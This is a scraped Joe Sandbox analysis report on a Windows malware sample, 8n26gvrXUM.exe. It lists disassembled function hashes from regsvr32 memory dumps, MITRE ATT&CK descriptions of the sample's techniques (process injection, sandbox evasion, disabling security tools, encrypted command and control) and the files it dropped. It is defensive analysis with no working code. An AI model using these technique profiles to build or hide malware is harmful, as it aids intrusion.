Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa6c31274e265ce1902d2e9aefffc584ea27695c69051998d8be4890ae683040
Instruction ID: 88dd9694f53c65975a69c3a91ac1b3831436ca1816bd9fcd2499b62556dfb278
Opcode Fuzzy Hash: aa6c31274e265ce1902d2e9aefffc584ea27695c69051998d8be4890ae683040
Instruction Fuzzy Hash: CEE0DF22F1880A0FE7A8A76C64203FD72E2FBC9750F440239914EC3787EE7E98025380

Function 00007FFD34352FF9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee91feb8bdbb097e8b8d5665525d5b2dc6129e382700142b47ef47c9f3f24a2a
Instruction ID: eb418bc7d5be54a5d6795b9532bcf2e92015f7fcff0c17e079e21f41f75443bc
Opcode Fuzzy Hash: ee91feb8bdbb097e8b8d5665525d5b2dc6129e382700142b47ef47c9f3f24a2a
Instruction Fuzzy Hash: 9AF03092A5EBC50FD792A33818B51943FA19F17210F8A02FBC189CB1E3D91E680A9312

Function 00007FFD34352343 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67cdff1bb8e1b7a8edc9b0d333c2e0aee6d6ea5a05d841839afe3c7bf1f2776
Instruction ID: c97eb00396e6fe8b1931ce38d3ab5f479b67800f6524e180ea7f31b9d4e084e1
Opcode Fuzzy Hash: b67cdff1bb8e1b7a8edc9b0d333c2e0aee6d6ea5a05d841839afe3c7bf1f2776
Instruction Fuzzy Hash: A3F0AC34B499098FDB84FB6490A2ABC7262FF4A304F500078D50DD7282CF7EB8419B41

Function 00007FFD34559B29 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bb5001ffd85686b5ed20c4320848def477f84ef312333598d18c76727127a7
Instruction ID: 12f691b72c25f838c5efdc24b55945b60941c365b4d4866e22aa40989e12fb17
Opcode Fuzzy Hash: 39bb5001ffd85686b5ed20c4320848def477f84ef312333598d18c76727127a7
Instruction Fuzzy Hash: 72E02B31B10B4C4B8F0DA53D88AA43073D5D7AB106388416A9406CB396EC55DC85C341

Function 00007FFD34557C88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b6d7defc16fc4e234c57c80fd1fb4109f102b455e3ce71451177dfab82d0e0
Instruction ID: ea8860d7675a787cd5ee9e514ffcdea6b0499d41dc80d1635cacea9bbe31dc8d
Opcode Fuzzy Hash: 89b6d7defc16fc4e234c57c80fd1fb4109f102b455e3ce71451177dfab82d0e0
Instruction Fuzzy Hash: 8CD05B34B60A4C474F0CA52D449943073D1D7AA5067D44179940BC7295DD59EC45C744

Function 00007FFD34351DD9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebb8a6d476ab85757cc61ffc06780719d6fe3705247a74cf04dfd519ec2c0f9
Instruction ID: 5838b2c583c336cb14c00f7f35af0b3969bb2f15c8e8fa5c705e6997d8fe6c45
Opcode Fuzzy Hash: 5ebb8a6d476ab85757cc61ffc06780719d6fe3705247a74cf04dfd519ec2c0f9
Instruction Fuzzy Hash: 41E09221E0E7D50FD763737458BA1A4BEB19F07210B4A04FAC148CB1D3E81E98808342

Function 00007FFD34527D28 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb28691abd05ba7ecc1c483442dd8f723ba0fe8a0d915e5b00d4edfa211d65f
Instruction ID: 17a46ca2c56ec1ce24fd6a0062f9e84b5ea11e8dd5ffa327edd2179aec52b223
Opcode Fuzzy Hash: 8bb28691abd05ba7ecc1c483442dd8f723ba0fe8a0d915e5b00d4edfa211d65f
Instruction Fuzzy Hash: 5DD0C951BAA41207F644318CACE73B87686DB8AB14F60403BE64DC73C6C89E6C821282

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8n26gvrXUM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pvd3v1r.d4p.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12jbwdfy.132.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lc5dk53.yus.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bku3nqu0.iew.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxb5ntlk.3qh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbrupa20.asz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxrj23vh.lag.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkrtapzb.xxl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unmo1iow.iuz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xghx2uqo.hca.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrjitvkx.dwz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlfmmjfe.n0x.psm1

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll

C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_isdecmp.dll

Windows Analysis Report
8n26gvrXUM.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre